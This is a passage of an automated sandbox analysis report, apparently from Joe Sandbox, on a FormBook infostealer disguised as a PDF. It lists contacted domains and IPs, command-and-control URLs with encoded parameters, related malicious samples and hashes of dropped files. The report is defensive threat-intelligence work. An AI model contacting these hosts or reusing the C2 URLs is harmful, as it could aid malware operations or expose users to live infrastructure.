                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.mandemj.topEyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHrcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.infocmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://delivery.consentmanager.netcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/pics/29590/bg1.png)cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://jino.rucmdl32.exe, 0000000C.00000002.3159746980.00000000057D4000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.0000000002B84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020F04000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2Fcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ecosia.org/newtab/cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ac.ecosia.org/autocomplete?q=cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://i3.cdn-image.com/__media__/js/min.js?v2.3cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            162.0.238.43
                            		www.mandemj.topCanada
                            		22612NAMECHEAP-NETUSfalse
                            45.114.171.236
                            		www.qwefs.orgHong Kong
                            		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                            84.32.84.32
                            		dfmagazine.shopLithuania
                            		33922NTT-LT-ASLTfalse
                            208.91.197.27
                            		www.kevin-torkelson.infoVirgin Islands (BRITISH)
                            		40034CONFLUENCE-NETWORK-INCVGfalse
                            195.161.68.8
                            		www.trapkitten.websiteRussian Federation
                            		8342RTCOMM-ASRUfalse
                            161.97.168.245
                            		www.disn-china.buzzUnited States
                            		51167CONTABODEfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1519456
                            Start date and time:2024-09-26 15:22:02 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 40s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:2
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Product Data Specifications_PDF.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@7/2@8/6
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 53
                            • Number of non-executed functions: 297
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: Product Data Specifications_PDF.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:19:41API Interceptor4030031x Sleep call for process: cmdl32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            162.0.238.43PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                            • www.storestone.xyz/pd4o/
                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • www.mandemj.top/to69/?vlJ0J=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB6xmvPC7jVOY3WNYEUB78n7uOkwblrlFm/iycyJOk57iLJ//IZc=&HDJP=Pnl8G6jPyrn
                            BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                            • www.mechecker.life/b6h1/
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • www.mandemj.top/to69/?mnShvP=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=&Cbj=nB9LWdWpMT7tUBt
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • www.mandemj.top/to69/?VzA=dz5HvTSP4ZdlFHDP&RD4=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=
                            x.exeGet hashmaliciousFormBookBrowse
                            • www.withad.xyz/r0nv/
                            bin.exeGet hashmaliciousFormBookBrowse
                            • www.withad.xyz/r0nv/
                            rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                            • www.heolty.xyz/sr8n/
                            4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                            • www.heolty.xyz/sr8n/
                            sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                            • www.heolty.life/niik/
                            45.114.171.236QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • www.qwefs.org/toq1/?vlJ0J=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjAxWJvZuyIttP8SZLxWgFhf4T9iqlbzDAEocRCjmQRWcevSsRoi8=&HDJP=Pnl8G6jPyrn
                            SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                            • www.qwefs.org/toq1/?6JAhxhQ=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjBxXPrZeNNfVPxSdlxWEZhsRe9BSDbyrqKKQRMjmYHHpOtg==&In3=AzvpidDp
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • www.qwefs.org/toq1/?mnShvP=uFBHOFjbtFvxqkcdylRor5ZXABbRnIRXIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjSH+IvcCxIq8UmCV22VYFhLV+6SqhbzX/O5o=&Cbj=nB9LWdWpMT7tUBt
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • www.qwefs.org/toq1/?RD4=uFBHOFjbtFvxqkcdylRor5ZXABbRnIRXIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjSH+IvcCxIq8UmCV22VYFhLV+6SqhbzX/O5o=&VzA=dz5HvTSP4ZdlFHDP
                            RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                            • www.qwefs.org/toq1/?oXfTz=uFBHOFjbtFvxqkcdykh4q5JXJh6ZnoRXIDe+8RHTfxNdoahKRW8U0UCbhdOPwbKTgOK/uYLPOnJNTGOjy1yfZhGBvJuEIq595D1l2WQbreJE8ATQCjT4LKwEBjf/&kxfp9=-6Mh
                            84.32.84.32PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                            • www.agilizeimob.app/zkp2/
                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.dfmagazine.shop/7k8f/
                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • www.dfmagazine.shop/wc8m/?vlJ0J=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhLN2h2DTK9csfh9AcreeAGSJ1TcJEV0fpWOmE9rV6P4iWQH1GQ0=&HDJP=Pnl8G6jPyrn
                            PO23100072.exeGet hashmaliciousFormBookBrowse
                            • www.agilizeimob.app/we8s/
                            notificacion_de_credito__PDF__.exeGet hashmaliciousFormBookBrowse
                            • www.thepeatear.online/929i/
                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                            • www.bodegamayorista.online/8xob/
                            PO-001.exeGet hashmaliciousFormBookBrowse
                            • www.godoggyonbase.online/24uv/
                            ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.loan-insurance.shop/iqhs/
                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                            • www.pakmartcentral.shop/ml5l/
                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                            • www.pakmartcentral.shop/vjx2/

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            www.disn-china.buzzQlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 161.97.168.245
                            SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                            • 161.97.168.245
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • 161.97.168.245
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • 161.97.168.245
                            RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                            • 161.97.168.245
                            www.trapkitten.websiteQlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 195.161.68.8
                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                            • 195.161.68.8
                            SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                            • 195.161.68.8
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • 195.161.68.8
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • 195.161.68.8
                            www.kevin-torkelson.infoPO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            www.qwefs.orgQlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 45.114.171.236
                            SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                            • 45.114.171.236
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • 45.114.171.236
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • 45.114.171.236
                            RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                            • 45.114.171.236
                            www.mandemj.topQlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 162.0.238.43
                            SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                            • 162.0.238.43
                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                            • 162.0.238.43
                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                            • 162.0.238.43

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            NTT-LT-ASLTPO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                            • 84.32.84.32
                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 84.32.84.32
                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 84.32.84.32
                            PO23100072.exeGet hashmaliciousFormBookBrowse
                            • 84.32.84.32
                            http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                            • 84.32.84.79
                            https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                            • 84.32.84.197
                            https://bjhms.com/modify/Get hashmaliciousUnknownBrowse
                            • 84.32.84.196
                            https://hfsuit.com/modify/Get hashmaliciousUnknownBrowse
                            • 84.32.84.22
                            https://kqmrw.com/modify/Get hashmaliciousUnknownBrowse
                            • 84.32.84.153
                            https://ppjmz.com/modify/Get hashmaliciousUnknownBrowse
                            • 84.32.84.125
                            POWERLINE-AS-APPOWERLINEDATACENTERHKNVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                            • 156.242.132.82
                            rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 45.114.171.236
                            oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            file.exeGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            file.exeGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            DHL Arrive Notice doc pdf.exeGet hashmaliciousFormBookBrowse
                            • 160.124.205.227
                            Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                            • 154.215.72.110
                            CONFLUENCE-NETWORK-INCVGPO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 208.91.197.27
                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            http://17ebook.comGet hashmaliciousUnknownBrowse
                            • 208.91.196.46
                            List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 208.91.197.27
                            Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                            • 208.91.197.27
                            http://kateandkaylearningacademy.comGet hashmaliciousUnknownBrowse
                            • 208.91.196.253
                            NAMECHEAP-NETUSNVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                            • 199.192.21.169
                            https://centuriontm.bizarreonly.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                            • 162.0.228.73
                            CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                            • 63.250.47.40
                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                            • 162.0.236.169
                            https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29tGet hashmaliciousHTMLPhisherBrowse
                            • 198.54.115.105
                            https://recommendationshaft-facc4a.ingress-comporellon.ewp.live/wp-content/plugins/Suspendisse-vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                            • 63.250.43.6
                            https://zerovoid-voidic-facc4a.ingress-erytho.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                            • 63.250.43.132
                            https://yw2tr-d6987d.ingress-bonde.ewp.live/wp-content/plugins/deviswetransfer%202/log.phpGet hashmaliciousUnknownBrowse
                            • 63.250.43.2
                            https://dji.repair/wnfslydy.phpGet hashmaliciousUnknownBrowse
                            • 162.0.238.241
                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 192.64.117.204

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\635gG211

                            Download File
                            Process:C:\Windows\SysWOW64\cmdl32.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:modified
                            Size (bytes):196608
                            Entropy (8bit):1.1215420383712111
                            Encrypted:false
                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                            MD5:9A809AD8B1FDDA60760BB6253358A1DB
                            SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                            SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                            SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nonhazardousness

                            Download File
                            Process:C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                            File Type:data
                            Category:modified
                            Size (bytes):288768
                            Entropy (8bit):7.994114653162179
                            Encrypted:true
                            SSDEEP:3072:wimkZb1nEv150OKEybH7B3a7I/8HKuJ+xddfKyWz3P62ffFtCaFOIDB7fQVQXsI4:dm8nNbB3as09+xddiySP6YtCODWfB/08
                            MD5:1E97CB7AB05D0719CF8A43198215FB3C
                            SHA1:0649A35C2F3008CE35020775B0A4B068DFFCA76C
                            SHA-256:1CAE3A07FE2732CB4F88BAC2173144F2778D017E66CCE103001494CCC72AE440
                            SHA-512:38917BD3F71D3897F5D075A9B779481E270EEC1059EA183E13023E37C2A4324A00C00FABAE22DE10A69F868DF2D710294BAFAE032A49668D3E1D60816EAC47C2
                            Malicious:false
                            Reputation:low
